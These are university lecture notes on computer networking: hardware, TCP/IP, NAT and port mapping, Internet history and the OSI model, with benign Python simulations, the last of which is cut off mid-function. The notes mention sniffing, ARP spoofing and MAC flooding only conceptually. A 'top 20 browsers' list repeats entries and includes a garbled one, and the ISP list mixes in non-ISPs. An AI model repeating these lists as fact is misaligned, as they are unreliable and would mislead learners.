
Ph.D. Course Work
UNIT-III
RCS 103
Computer Applications

INTRODUCTION TO COMPUTER NETWORKS

Networking: Computers on the Internet

• 1969 – 4
• 1971 – 15
• 1984 – 1,000
• 1987 – 10,000
• 1989 – 100,000
• 1992 – 1,000,000
• 1996 – 10,000,000
• 2001 – 100,000,000
• By the mid-2000s – hundreds of millions of hosts, heading toward billions of connected devices
Typical LAN (“Local Area Network”)

(Figure: several computers connected by cable to a central hub or switch.)

Client/Server Networks

(Figure: client PCs connected through the LAN to a dedicated server.)

Network Hardware
• The most essential networking hardware devices for us to learn about are:
– Cables
– NICs
– Hubs
– Switches
– Routers

Wire Media

(Figure: twisted pair, coaxial and fibre cabling.)

Media Bandwidth

(Figure: bandwidth by medium; copper Ethernet now runs at up to 1000 Mbps = 1 Gbps.)

NIC – a “Network Interface Card”

• Every networked device must have a NIC
– Most laptops today have both a wired NIC and a wireless NIC
• Each NIC is configured with an IP address (its “logical address”) and carries a physical address called a MAC address.
– The MAC address is assigned at the factory and is intended to be globally unique.
– In practice the operating system can override it and attackers routinely spoof it, so a MAC address identifies a card, not a trustworthy identity; it must not be used as an authentication credential.
• MAC addresses are used within a LAN
– IP addresses allow routers to route a message across different networks
– when a message reaches the correct destination network, the correct NIC is identified via its MAC address (looked up with ARP on IPv4 networks).

Hubs
• A “hub” is a networking component into which you can plug multiple network devices
– Connect computers, printers, scanners, etc.
• Whenever a connected device sends a network message, the hub repeats the message to all other connected devices (not just the intended recipient!)
– Unintended recipients are expected to ignore traffic not addressed to them (akin to “screening” telephone calls)
– A NIC put into promiscuous mode does not ignore it, which is what gives a “packet sniffer” on a hub a copy of everyone’s traffic
• A hub can only deal with one message at a time, since every message is broadcast over all connections (all ports share one collision domain)

Switches
• A switch is a network device which directs traffic only to its intended destination(s) rather than to all devices on the network.
– sometimes referred to as an “intelligent hub”
– it does this by learning which MAC address is reachable on which port from the source address of the frames it receives
• Provides a dedicated connection between individual devices
– multiple devices can send data at once

A Network Switch

(Figure: Station A transmits to Station C; the switch receives the data and sends it back out on a single port, the one leading to Station C. Stations B and D do not see the frame.)

Switches

• Consider the packet-sniffing threat for people who share a hub and have not activated network encryption
– Data sent “in the clear” means it has not been encrypted, and therefore is vulnerable to eavesdropping via a hub
• As the prices for switches have dropped tremendously over time, most companies have replaced hubs with switches
– A switch reduces casual eavesdropping by sending data on the LAN only to the intended recipient
– It does not eliminate it: a switch still floods frames whose destination it has not learned yet, and an attacker on the same LAN can spoof ARP replies or overflow the switch’s MAC table so that traffic is redirected to, or flooded past, their port. Encryption is still needed for confidentiality on a switched LAN.
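To make the hub-versus-switch difference concrete, here is an added simulation (example code, not from the original slides): four stations on four ports, a hub that repeats every frame, and a learning switch that builds a MAC table from source addresses. The MAC addresses, port numbers and frames are constructed for the example. Note that the switch still floods the very first frame, whose destination it has not learned yet, so the sniffer on port 2 sees that one even without a hub.

```python
from collections import defaultdict

# Constructed wiring for the example: station MAC address -> hub/switch port.
PORTS = {
    "aa:aa:aa:aa:aa:aa": 1,   # Station A
    "bb:bb:bb:bb:bb:bb": 2,   # Station B (runs a packet sniffer, never transmits)
    "cc:cc:cc:cc:cc:cc": 3,   # Station C
    "dd:dd:dd:dd:dd:dd": 4,   # Station D
}

# Constructed frames (src MAC, dst MAC, payload): A and C talk, B only listens.
FRAMES = [
    ("aa:aa:aa:aa:aa:aa", "cc:cc:cc:cc:cc:cc", "A->C hello"),
    ("cc:cc:cc:cc:cc:cc", "aa:aa:aa:aa:aa:aa", "C->A hello back"),
    ("aa:aa:aa:aa:aa:aa", "cc:cc:cc:cc:cc:cc", "A->C secret"),
]


def hub_forward(frames):
    """A hub repeats each frame on every port except the one it arrived on.
    Returns {port: [payloads observed on that port]}."""
    seen = defaultdict(list)
    for src, _dst, payload in frames:
        in_port = PORTS[src]
        for port in PORTS.values():
            if port != in_port:
                seen[port].append(payload)
    return dict(seen)


class LearningSwitch:
    """Transparent-bridge behaviour: remember which port each source MAC was
    seen on, forward to that port when the destination is known, otherwise
    flood exactly like a hub."""

    def __init__(self):
        self.table = {}               # MAC -> port
        self.seen = defaultdict(list)

    def receive(self, src, dst, payload):
        in_port = PORTS[src]
        self.table[src] = in_port     # learn (a host forging src MACs can poison this)
        out_port = self.table.get(dst)
        if out_port is None:
            targets = [p for p in PORTS.values() if p != in_port]   # unknown: flood
        else:
            targets = [out_port]
        for port in targets:
            self.seen[port].append(payload)


def switch_forward(frames):
    """Run the frames through a fresh learning switch.
    Returns ({port: [payloads]}, learned MAC table)."""
    sw = LearningSwitch()
    for frame in frames:
        sw.receive(*frame)
    return dict(sw.seen), dict(sw.table)


if __name__ == "__main__":
    print("hub, port 2 sees:   ", hub_forward(FRAMES).get(2))
    seen, table = switch_forward(FRAMES)
    print("switch, port 2 sees:", seen.get(2))
    print("switch MAC table:   ", table)
```

With the hub, port 2 receives all three payloads including "A->C secret"; with the switch, port 2 receives only the flooded first frame. The learning step is also the weakness: a station that forges source MAC addresses can fill the table (MAC flooding) or claim another station's address, after which the switch floods or misdirects frames, which is why encryption rather than the switch is the real confidentiality control.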

Routers
Different networks connect via routers (not switches or hubs).
Routers even connect networks built on different link-layer technologies, which is important since not all networks use the same one.

(Figure: Network X and Network Z, each built from switches, joined through routers.)

Gateway router
• When your computer needs to contact a computer that is not within the immediate network (i.e., your LAN), your computer’s networking software is configured to send the request to a particular router called the
– Default Gateway, or
– Gateway router
• Your computer decides “local or gateway?” by comparing the destination address with its own subnet; everything outside the subnet is handed to the gateway’s MAC address while the IP header still carries the final destination.
• For each of us, the most noteworthy role of the gateway router is to connect your computer’s LAN to your ISP’s larger network so that your computer can access the Internet
• Therefore, a gateway router is your computer’s on-ramp to the Internet.
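The “is this destination on my LAN, or does it go to the default gateway?” decision is a routing-table lookup. The following added example (not code from the slides) implements the longest-prefix-match rule that hosts and routers apply, using a constructed table: a directly connected 192.168.0.0/24, a more specific route via a second router at 192.168.0.254, and the default route 0.0.0.0/0 via the gateway 192.168.0.1. The interface name eth0 and all addresses are assumptions for the example.

```python
import ipaddress

# Constructed routing table: (prefix, next hop or None if directly connected, interface).
ROUTES = [
    ("192.168.0.0/24", None,            "eth0"),  # the LAN itself
    ("10.8.0.0/16",    "192.168.0.254", "eth0"),  # reach 10.8/16 via a second router
    ("0.0.0.0/0",      "192.168.0.1",   "eth0"),  # default gateway: everything else
]


def build_table(routes):
    """Parse the string table into ipaddress objects once."""
    return [
        (ipaddress.ip_network(prefix),
         ipaddress.ip_address(gateway) if gateway else None,
         iface)
        for prefix, gateway, iface in routes
    ]


def lookup(table, destination):
    """Longest-prefix match: among all routes that contain the destination,
    pick the one with the longest (most specific) prefix. The /0 default
    route matches everything, so it only wins when nothing else does."""
    dst = ipaddress.ip_address(destination)
    best = None
    for net, gateway, iface in table:
        if dst in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, gateway, iface)
    if best is None:
        raise LookupError("no route to %s" % dst)
    net, gateway, iface = best
    # Directly connected: the next hop is the destination itself, which ARP
    # resolves to a MAC address. Otherwise the frame goes to the gateway's MAC
    # while the IP header still names the final destination.
    next_hop = "on-link" if gateway is None else str(gateway)
    return str(net), next_hop, iface


if __name__ == "__main__":
    table = build_table(ROUTES)
    for ip in ("192.168.0.7", "10.8.3.4", "12.6.1.3"):
        print(ip, "->", lookup(table, ip))
```

The default route is the single most valuable entry for an attacker on the LAN: whoever can change it (for example with a rogue DHCP server or an ARP-spoofed gateway) receives every packet leaving the subnet.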
Standard networking protocols (communications standards)
• The committee that addresses LAN standards is called the IEEE 802 Committee.
– Thus, IEEE LAN standards always start with the number 802.
• “Ethernet” is a particular standard published by this committee as “802.3”.
– Ethernet (802.3) is the world’s #1 wired-LAN standard
– There are other LAN standards besides Ethernet, but it is dominant
• Most PCs’ NICs support 10/100/1000 Mbps Ethernet.

Packet switching
• Data travels in small chunks: Ethernet (IEEE 802.3) carries them as frames on the LAN, and IP carries them as packets across networks
• Long messages are broken into short packets
– Keeps one user from hogging a line (statistical multiplexing)
– Each packet is tagged with where it is going
• Each packet is routed separately
– Packets of one message may take different routes across the Internet
– Packets can therefore arrive out of order, be duplicated, or be lost
– The receiver must reconstruct the original message from sequence numbers
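As an added example (not from the original slides), the following code splits a message into numbered packets and reassembles it at the receiver after a constructed “network” has shuffled and duplicated them; it also reports which sequence numbers are missing when a packet is lost, which is the information a transport protocol needs in order to ask for a retransmission. The message, addresses and payload size are constructed sample data.

```python
import random


def packetize(message, payload_size, src, dst):
    """Split a message into numbered packets; each carries the addresses and
    its sequence number so the receiver can put it back in order."""
    chunks = [message[i:i + payload_size]
              for i in range(0, len(message), payload_size)] or [b""]
    return [{"src": src, "dst": dst, "seq": n, "total": len(chunks), "data": chunk}
            for n, chunk in enumerate(chunks)]


def scramble(packets, seed=1):
    """Constructed 'network': deliver out of order and duplicate one packet."""
    rng = random.Random(seed)
    delivered = list(packets)
    rng.shuffle(delivered)
    delivered.append(packets[0])          # a duplicate, e.g. after a retransmission
    return delivered


def reassemble(packets):
    """Rebuild the message from packets in any order.
    Returns (message, []) when complete, or (None, [missing seqs]) when not."""
    buffer = {}
    total = None
    for p in packets:
        total = p["total"]
        buffer.setdefault(p["seq"], p["data"])   # first copy wins; duplicates ignored
    if total is None:
        return b"", []
    missing = [n for n in range(total) if n not in buffer]
    if missing:
        return None, missing
    return b"".join(buffer[n] for n in range(total)), []


MESSAGE = b"The quick brown fox jumps over the lazy dog"   # constructed sample

if __name__ == "__main__":
    pkts = packetize(MESSAGE, 10, "24.48.0.1", "12.6.1.3")
    print(len(pkts), "packets")
    print(reassemble(scramble(pkts)))
    print(reassemble([p for p in pkts if p["seq"] != 2]))   # one packet lost
```

The receiver trusts the sequence and total fields inside each packet, exactly as a real reassembler trusts its headers; a sender that forges them can make the receiver hold buffer space indefinitely for a message that never completes, which is why real stacks bound reassembly buffers and time them out.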

TCP/IP
• Transmission Control Protocol/Internet Protocol (TCP/IP) provides the technical foundation for the public Internet as well as for large numbers of private networks. It is defined in terms of layers.
• Do you use TCP/IP?
– If you are on the Internet, yes, you are using TCP/IP.
• (Figure: the TCP/IP layers, with particular implementations of each layer shown at right.)

A TCP/IP network packet

• Here is the basic structure of any one of the trillions of packets traversing the Internet at this moment

(Figure: a packet consists of a Header, a Data Field and a Trailer. The header contains the Sender IP Address field and the Destination IP Address field.)

A visual traceroute tool that shows the route packets take: http://www.yougetsignal.com/tools/visual-tracert/

Tying this back to Switches and Routers

• Routers operate between networks (at the “internet” layer of TCP/IP) and use IP addresses to direct network traffic
• Switches work within a single network (at the “network interface” layer of TCP/IP) and use the hardware MAC addresses we discussed earlier

Wireless networking
• Wireless fidelity (Wi-Fi) – a means of linking computers into a wireless local area network (WLAN)
• Also referred to as 802.11 (another member of the IEEE 802 family)
• Wi-Fi has evolved through various standards, the most common of which have been:
– 802.11b, with 11 Mbps bandwidth
– 802.11g, with 54 Mbps bandwidth
– 802.11n, with 100–300 Mbps in practice (up to 600 Mbps in the specification); later amendments (802.11ac, 802.11ax) are faster still
• Because radio is a shared medium, a WLAN behaves like a hub for eavesdropping purposes: anyone in range receives every frame, so link encryption (WPA2/WPA3) matters even more than on a wired LAN.

Basic web networking scenario

(Figure: You (24.48.0.1) – ISP – Internet – ISP – Your BFF (12.6.1.3).)

Not secure. You and your BFF are exposed and relying on your ISPs to provide all security (from hacker attacks, viruses, worms), which in practice they do not.
• Both IPs are publicly accessible: anyone on the Internet can send packets straight to your PC.

Better: add a router (a “firewall”)

(Figure: You (192.168.0.1) – wireless connection to hub/router (24.48.0.1) – ISP – Internet – ISP – Your BFF (12.6.1.3).)

Better. You buy a router that connects to your ISP. The router holds the public address 24.48.0.1 and assigns your PC a private IP address. Strictly speaking a NAT router is not a firewall, but because it has no translation entry for unsolicited inbound packets it drops them, which gives much of the same protection for the hosts behind it.

Recall Private IP addresses

• Is anyone here using this IP address at home?
– 192.168.0.1
• How can many people use the same IP address?
– “I thought each computer on the Internet required a different IP address?”
• Recall: RFC 1918 reserved the following ranges of IP addresses for private use. They are routed normally inside a private network, but ISPs and Internet routers will not forward packets with these destinations, so the same addresses can be reused in every home and office:
– 10.0.0.0 – 10.255.255.255 (10.0.0.0/8)
– 172.16.0.0 – 172.31.255.255 (172.16.0.0/12)
– 192.168.0.0 – 192.168.255.255 (192.168.0.0/16)

Private IP address requires your router’s NAT (Network Address Translation)

(Figure: You (192.168.0.1) – router (24.48.0.1) – ISP – Internet – ISP – Your BFF (12.6.1.3). Packets leave your PC “From 192.168.0.1” and leave the router “From 24.48.0.1”.)

Your router’s NAT feature modifies your outgoing packets such that their source IP becomes 24.48.0.1. Your BFF’s chat program thus sends its response to 24.48.0.1. Your router’s NAT function then changes the destination IP on the response packets it receives from your BFF back to 192.168.0.1, using the translation-table entry it created when the first packet went out.

Hiding multiple servers behind one IP address: Port Mapping
• Port mapping is what allows companies to have multiple servers accessible via one IP address and the corresponding DNS name
• Common example: a company wishes to run both an FTP and a web server from its domain name, asite.com
– ftp://www.asite.com
• Note: this is equivalent to typing ftp://www.asite.com:21 because port 21 is the default for FTP
• The firm’s router with port mapping will send port 21 traffic to the FTP server
– http://www.asite.com
• Note: this is equivalent to typing http://www.asite.com:80 because port 80 is the default for HTTP
• The firm’s router with port mapping will send port 80 traffic to the web server

Hiding multiple servers behind one public IP address: Port Mapping

(Figure: incoming packets for 224.60.32.1:21 and 224.60.32.1:80 arrive from the Internet at the corporate router, which has port mapping and NAT activated on public address 224.60.32.1. It forwards port 21 to the FTP server at 192.168.0.1:21 and port 80 to the web server at 192.168.0.2:80. Note that 224.60.32.1 lies in the 224.0.0.0/4 multicast range and could not really be a host’s public address; read it as a placeholder.)
• A mapped port is reachable by everyone on the Internet, so each mapped server must be hardened as if it had a public address of its own.
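The two slides above (NAT for outbound traffic, port mapping for inbound) are the two halves of one translation table. Here is an added simulation of both (example code, not from the original slides): outbound packets from RFC 1918 sources are rewritten to the public address with a fresh port, replies are matched back through that entry, and static mappings deliver inbound port 21 and port 80 to the two servers. The addresses are the slides' own plus 203.0.113.5 from the documentation range as an outside host; packets are plain dicts, which is an assumption of the example.

```python
import ipaddress

# RFC 1918 private ranges from the previous slide.
PRIVATE = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_private(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in PRIVATE)


class Nat:
    """Source NAT with port translation for outbound traffic, plus static port
    mapping so inbound connections to chosen public ports reach servers on
    private addresses. Packets are dicts with keys src, sport, dst, dport."""

    def __init__(self, public_ip, port_map=None, first_port=40000):
        self.public_ip = public_ip
        self.port_map = dict(port_map or {})  # public port -> (private ip, private port)
        self.outbound_map = {}                # (priv ip, priv port, dst ip, dst port) -> public port
        self.reply_map = {}                   # public port -> (priv ip, priv port)
        self.next_port = first_port

    def outbound(self, pkt):
        """Rewrite a packet leaving the LAN so that replies come back to us."""
        if not is_private(pkt["src"]):
            return pkt                        # already a public source, nothing to do
        key = (pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"])
        if key not in self.outbound_map:
            self.outbound_map[key] = self.next_port
            self.reply_map[self.next_port] = (pkt["src"], pkt["sport"])
            self.next_port += 1
        return {**pkt, "src": self.public_ip, "sport": self.outbound_map[key]}

    def inbound(self, pkt):
        """Rewrite a packet arriving from the Internet, or drop it (None) when
        neither a static mapping nor an earlier outbound flow explains it."""
        if pkt["dst"] != self.public_ip:
            return None
        target = self.port_map.get(pkt["dport"]) or self.reply_map.get(pkt["dport"])
        if target is None:
            return None
        priv_ip, priv_port = target
        return {**pkt, "dst": priv_ip, "dport": priv_port}


if __name__ == "__main__":
    nat = Nat("24.48.0.1", port_map={21: ("192.168.0.1", 21), 80: ("192.168.0.2", 80)})
    out = nat.outbound({"src": "192.168.0.1", "sport": 5555, "dst": "12.6.1.3", "dport": 443})
    print("outbound rewritten to", out["src"], out["sport"])
    print("reply lands at", nat.inbound({"src": "12.6.1.3", "sport": 443,
                                         "dst": "24.48.0.1", "dport": out["sport"]}))
    print("port 80 mapped to", nat.inbound({"src": "203.0.113.5", "sport": 1234,
                                            "dst": "24.48.0.1", "dport": 80}))
    print("unsolicited port 22:", nat.inbound({"src": "203.0.113.5", "sport": 1234,
                                               "dst": "24.48.0.1", "dport": 22}))
```

Two design points worth noticing. The reply map here is keyed on the public port alone, so any outside host can send to a port once it has been opened (full-cone behaviour); real NATs usually also check the remote address and port, and they expire idle entries. And the static map makes the FTP and web servers reachable by the entire Internet: for those two ports the NAT provides no protection at all.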

What is a Comm. Network?

A communications network is a network of links and nodes arranged so that messages may be passed from one part of the network to another.

• What are nodes and links?
– People and roads
– Telephones and switches
– Computers and routers
• What is a message? Information.
• Networks are key for:
– Speed
– Distance
Most operating systems have a default browser. These may be faster and easier to manage. Here are the top 20 internet browsers as listed on the slide:
01. Google Chrome
02. Safari
03. Safari Block
04. Mozilla Firefox
05. Mozilla Firebird
06. Opera
07. Internet Explorer
08. Internet Explorer
09. Maxthon Browser
10. Vivaldi
11. Falkon
12. Epic Privacy Browser
13. RockMelt
14. Brave
15. Slim Browser
16. Torch Browser
17. Konqueror browser
18. Nightly
19. Netscape
20. Flock

Most Popular Search Engines:


• Google
• Microsoft Bing
• Yahoo
• Baidu
• Yandex
• DuckDuckGo
• Ask.com
• Ecosia
• Aol.com
• Internet Archive

Internet Service Providers in India

• Airtel India
• Amazon Networking Devices
• Beam Fiber
• Bharti Airtel
• Bharti Enterprises
• BSNL Broadband
• Cherrinet
• DEN Networks
• Idea Cellular
• Jio
• Madison Media Group
• Mahanagar Telephone Nigam
• MTS M-Blaze
• Reliance Communications
• Sancharnet
• Siti Cable
• Spectranet
• Spice Telecom
• Tata Communications
• Tata Teleservices
• Tikona Digital Networks
• Uninor
• Videocon
• Vodafone India
• You Broadband

Networks are Old

• 2400 BC: courier networks in Egypt
• 550 BC: postal service invented in Persia

Problems:
• Speed
• Reliability
• Security

Submarine Cables + The Telegraph

• 1850 – first submarine cables laid
• …by 1900 the first global communications network!

(Figure: map of submarine cables in 1895.)

Towards Electric Communication

• 1837: Telegraph invented by Samuel Morse
– Distance: 10 miles
– Speed: 10 words per minute
– In use until 1985!
• Key challenge: how to encode information? Higher compression = faster speeds
– Originally used unary encoding: A • B •• C ••• D •••• E •••••
– Next generation: binary (variable-length) encoding, with the commonest letters given the shortest codes: A •– B –••• C –•–• D –•• E •

Growth of the Telephone Network


• 1881: Twisted pair for local loops
• 1885: AT&T formed
• 1892: Automatic telephone switches
• 1903: 3 million telephones in the US
• 1915: First transcontinental cable
• 1927: First transatlantic cable
• 1937: first round-the-world call
• 1946: National numbering plan

Crazy idea: Packet switching

• Telephone networks are circuit switched
– Each call reserves resources end-to-end
– Provides excellent quality of service
• Problems
– Resource intensive (what if the circuit is idle?)
– Complex network components (per-circuit state, security)
• Packet switching
– No connection state, network is store-and-forward
– Minimal network assumptions
– Statistical multiplexing gives high overall utilization

History of the Internet

• 1961: Kleinrock @ MIT: packet-switched network
• 1962: Licklider’s vision of Galactic Network
• 1965: Roberts connects computers over phone line
• 1967: Roberts publishes vision of ARPANET
• 1969: BBN installs first Interface Message Processor (IMP) at UCLA
• 1970: Network Control Program (NCP)
• 1972: Public demonstration of ARPANET
• 1972: Kahn @ DARPA advocates Open Architecture
• 1972: Vint Cerf @ Stanford writes TCP

(Figures: ARPANET maps for the 1960s and 1971.)

1973

• Satellite link to Hawaii
• First international connection (London + Norway)

Growing Pains
• Problem: early networks used incompatible protocols

Kahn’s Ground Rules

1. Each network is independent, cannot be forced to change
– A network of networks
– Each running their own set of protocols
2. Best-effort communication (i.e. no guarantees)
3. Boxes (routers/gateways) connect networks
– Boxes that do not maintain state → keep them simple!
4. No global control

• Principles behind the development of IP
• Led to the Internet as we know it
• Internet is still structured as independent networks

The Birth of Routing

Trivia
• Kahn believed that there would only be ~20 networks.
• He was way off.
• Why?

(Figures: Internet maps for 2000, 2006 and 2009.)

More Internet History

• 1974: Cerf and Kahn paper on TCP (IP kept separate)
• 1980: TCP/IP adopted as defense standard
• 1983: ARPANET and MILNET split
• 1983: Global NCP to TCP/IP flag day
• 198x: Internet melts down due to congestion
• 1986: Van Jacobson saves the Internet (BSD TCP congestion control)
• 1987: NSFNET merges with other networks
• 1988: Deering and Cheriton propose multicast
• 1994: NSF backbone dismantled, private backbone
• 1999–present: The Internet boom and bust … and boom
• 2007: Release of iPhone, rise of Mobile Internet

Internet Applications Over Time

• 1972: Email
• 1973: Telnet – remote access to computing
• 1982: DNS – “phonebook” of the Internet
• 1985: FTP – remote file access
• 1989: NFS – remote file systems
• 1991: The World Wide Web (WWW) goes public
• 1995: SSH – secure remote shell access
• 1995–1997: Instant messaging (ICQ, AIM)
• 1998: Google
• 1999: Napster, birth of P2P
• 2001: BitTorrent
• 2004: Facebook
• 2005: YouTube
• 2007: The iPhone
• What is next?

Takeaways
• Communication is fundamental to human nature
• Key concepts have existed for a long time
– Speed/bandwidth
– Latency
– Switching
– Packets vs. circuits
– Encoding
– Cable management
– Multiplexing
– Routing
• The Internet has changed the world
– Promise of free ($) and free (freedom) communication
– Shrunk the world
• What made the Internet so successful? Stay tuned!

Computer Networks
A computer network connects two or more autonomous computers.

The computers can be geographically located anywhere.

LAN, MAN & WAN

A network in a small geographical area (a room, building or campus) is called a LAN (Local Area Network).

A network in a city is called a MAN (Metropolitan Area Network).

A network spread geographically (across a country or the globe) is called a WAN (Wide Area Network).

Applications of Networks
• Resource Sharing
– Hardware (computing resources, disks, printers)
– Software (application software)
• Information Sharing
– Easy accessibility from anywhere (files, databases)
– Search Capability (WWW)
• Communication
– Email
– Message broadcast
• Remote computing
• Distributed processing (GRID Computing)

Network Topology
The network topology defines the way in which computers, printers, and other devices are connected. A network topology describes the layout of the wire and devices as well as the paths used by data transmissions.

Bus Topology
Commonly referred to as a linear bus, all the devices on a bus topology are connected by one single cable. Every device therefore sees every transmission on the cable, and a single cable fault takes the whole segment down.

Star & Tree Topology

The star topology is the most commonly used architecture in Ethernet LANs. When installed, the star topology resembles spokes in a bicycle wheel.
Larger networks use the extended star topology, also called tree topology. When used with network devices that filter frames or packets, like bridges, switches, and routers, this topology significantly reduces the traffic on the wires by sending packets only to the wires of the destination host.

Ring Topology
A frame travels around the ring, stopping at each node. If a node wants to transmit data, it adds the data as well as the destination address to the frame. The frame then continues around the ring until it finds the destination node, which takes the data out of the frame.
Single ring – All the devices on the network share a single cable.
Dual ring – The dual ring topology allows data to be sent in both directions.

Mesh Topology
The mesh topology connects all devices (nodes) to each other for redundancy and fault tolerance. It is used in WANs to interconnect LANs and for mission-critical networks like those used by banks and financial institutions. Implementing the mesh topology is expensive and difficult.

Network Components
• Physical Media
• Interconnecting Devices
• Computers
• Networking Software
• Applications

Networking Media
Networking media can be defined simply as the means by which signals (data) are sent from one computer to another (either by cable or wireless means).

Networking Devices
Hubs, switches, routers, wireless access points, modems etc.

Computers: Clients and Servers

In a client/server network arrangement, network services are located in a dedicated computer whose only function is to respond to the requests of clients.

The server contains the file, print, application, security, and other services in a central computer that is continuously available to respond to client requests.

Networking Protocol: TCP/IP

(Figure: the TCP/IP protocol stack.)

Applications
• E-mail
• Searchable Data (Web Sites)
• E-Commerce
• News Groups
• Internet Telephony (VoIP)
• Video Conferencing
• Chat Groups
• Instant Messengers
• Internet Radio

OSI MODEL

Communication Architecture
Strategy for connecting host computers and other communicating equipment.
Defines necessary elements for data communication between devices.
A communication architecture, therefore, defines a standard for the communicating hosts.
A programmer formats data in a manner defined by the communication architecture and passes it on to the communication software.
Separating communication functions adds flexibility; for example, we do not need to modify the entire host software to include more communication devices.

Layer Architecture
Layer architecture simplifies the network design.
It is easy to debug network applications in a layered architecture network.
Network management is easier due to the layered architecture.
Network layers follow a set of rules, called a protocol.
The protocol defines the format of the data being exchanged, and the control and timing for the handshake between peer layers.

Open Systems Interconnection (OSI) Model

The International Organization for Standardization (ISO) established a committee in 1977 to develop an architecture for computer communication.
The Open Systems Interconnection (OSI) reference model is the result of this effort.
In 1984, the Open Systems Interconnection (OSI) reference model was approved as an international standard for communications architecture.
The term “open” denotes the ability to connect any two systems which conform to the reference model and associated standards.

OSI Reference Model

The OSI model is now considered the primary architectural model for inter-computer communications.
The OSI model describes how information or data makes its way from application programmes (such as spreadsheets) through a network medium (such as wire) to another application programme located on another network.
The OSI reference model divides the problem of moving information between computers over a network medium into SEVEN smaller and more manageable problems.
This separation into smaller, more manageable functions is known as layering.

OSI Reference Model: 7 Layers

(Figure: the seven layers, from Application at the top to Physical at the bottom.)

OSI: A Layered Network Model

The process of breaking up the functions or tasks of networking into layers reduces complexity.
Each layer provides a service to the layer above it in the protocol specification.
Each layer communicates with the same layer’s software or hardware on other computers.
The lower four layers (transport, network, data link and physical: Layers 4, 3, 2 and 1) are concerned with the flow of data from end to end through the network.
The upper three layers of the OSI model (application, presentation and session: Layers 7, 6 and 5) are oriented more toward services to the applications.
Data is encapsulated with the necessary protocol information as it moves down the layers before network transit.

Physical Layer
Provides the physical interface for transmission of information.
Defines rules by which bits are passed from one system to another on a physical communication medium.
Covers all mechanical, electrical, functional and procedural aspects of physical communication.
Such characteristics as voltage levels, timing of voltage changes, physical data rates, maximum transmission distances, physical connectors, and other similar attributes are defined by physical layer specifications.

Data Link Layer

The data link layer attempts to provide reliable communication over the physical layer interface.
Breaks the outgoing data into frames and reassembles the received frames.
Creates and detects frame boundaries.
Handles errors by implementing an acknowledgement and retransmission scheme (on link types that offer one; Ethernet only detects errors with a CRC and silently discards damaged frames).
Implements flow control.
Supports point-to-point as well as broadcast communication.
Supports simplex, half-duplex or full-duplex communication.

Network Layer
Implements routing of packets through the network.
Chooses the path the packet should take from the source to the destination.
Defines logical addressing so that any endpoint can be identified.
Handles congestion in the network.
Facilitates interconnection between heterogeneous networks (internetworking).
The network layer also defines how to fragment a packet into smaller packets to accommodate different media.

Transport Layer
The purpose of this layer is to provide a reliable mechanism for the exchange of data between two processes in different computers.

Ensures that the data units are delivered error free.
Ensures that data units are delivered in sequence.
Ensures that there is no loss or duplication of data units.
Provides connectionless or connection-oriented service (in TCP/IP, UDP offers only the connectionless best-effort service; the guarantees above are TCP’s).
Provides for connection management.
Multiplexes multiple connections over a single channel (port numbers identify the process at each end).

Session Layer
The session layer provides a mechanism for controlling the dialogue between the two end systems. It defines how to start, control and end conversations (called sessions) between applications.
This layer requests a logical connection to be established on an end-user’s request.
Any necessary log-on or password validation is also handled by this layer.
The session layer is also responsible for terminating the connection.
This layer provides services like dialogue discipline, which can be full duplex or half duplex.
The session layer can also provide a check-pointing mechanism such that if a failure of some sort occurs between checkpoints, all data can be retransmitted from the last checkpoint.

Presentation Layer
The presentation layer defines the format in which the data is to be exchanged between the two communicating entities.
It also handles data compression and data encryption (cryptography).

Application Layer
The application layer interacts with application programs and is the highest level of the OSI model.
The application layer contains management functions to support distributed applications.
Examples of application-layer protocols are those for file transfer, electronic mail, remote login etc.

OSI in Action
A message begins at the top application layer and moves down the OSI layers to the bottom physical layer.
As the message descends, each successive OSI model layer adds a header to it (the data link layer also adds a trailer).
A header is layer-specific information that basically explains what functions the layer carried out.
Conversely, at the receiving end, headers are stripped from the message as it travels up the corresponding layers, each layer checking its own header (for example, verifying a checksum) before handing the remainder up.

TCP/IP MODEL

OSI & TCP/IP Models

(Figure: the seven OSI layers beside the TCP/IP layers they correspond to.)
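Here is the encapsulation and decapsulation the slide describes, carried out on real header formats as an added example (not code from the original slides): a UDP header is prepended to the payload, then an IPv4 header with its one's-complement checksum, then an Ethernet header; the receiver peels the headers off in reverse and verifies the IPv4 checksum before trusting the rest. The MAC addresses, IP addresses, ports and payload are constructed sample values; the UDP checksum is left at zero, which IPv4 permits.

```python
import struct


def ones_complement_checksum(data):
    """RFC 1071 checksum as used by the IPv4 header."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                            # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def mac_bytes(mac):
    return bytes(int(part, 16) for part in mac.split(":"))


def ip_bytes(ip):
    return bytes(int(part) for part in ip.split("."))


def build_frame(src_mac, dst_mac, src_ip, dst_ip, sport, dport, payload):
    """Encapsulate top-down: UDP header, then IPv4 header, then Ethernet header."""
    # Layer 4: UDP (8 bytes). Checksum 0 means 'not computed', allowed over IPv4.
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    # Layer 3: IPv4 (20 bytes): version/IHL, TOS, total length, id, flags (DF),
    # TTL, protocol 17 = UDP, checksum placeholder, source, destination.
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0x1234, 0x4000,
                     64, 17, 0, ip_bytes(src_ip), ip_bytes(dst_ip))
    ip = ip[:10] + struct.pack("!H", ones_complement_checksum(ip)) + ip[12:]
    # Layer 2: Ethernet (14 bytes): destination MAC, source MAC, EtherType 0x0800 = IPv4.
    eth = mac_bytes(dst_mac) + mac_bytes(src_mac) + struct.pack("!H", 0x0800)
    return eth + ip + udp


def ipv4_header_valid(frame):
    """Receiver-side check: summing the header including its checksum field gives 0."""
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    return len(ip) >= ihl and ones_complement_checksum(ip[:ihl]) == 0


def parse_frame(frame):
    """Decapsulate bottom-up, stripping one header per layer as the slide describes."""
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != 0x0800:
        raise ValueError("not an IPv4 frame")
    if not ipv4_header_valid(frame):
        raise ValueError("IPv4 header checksum mismatch")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
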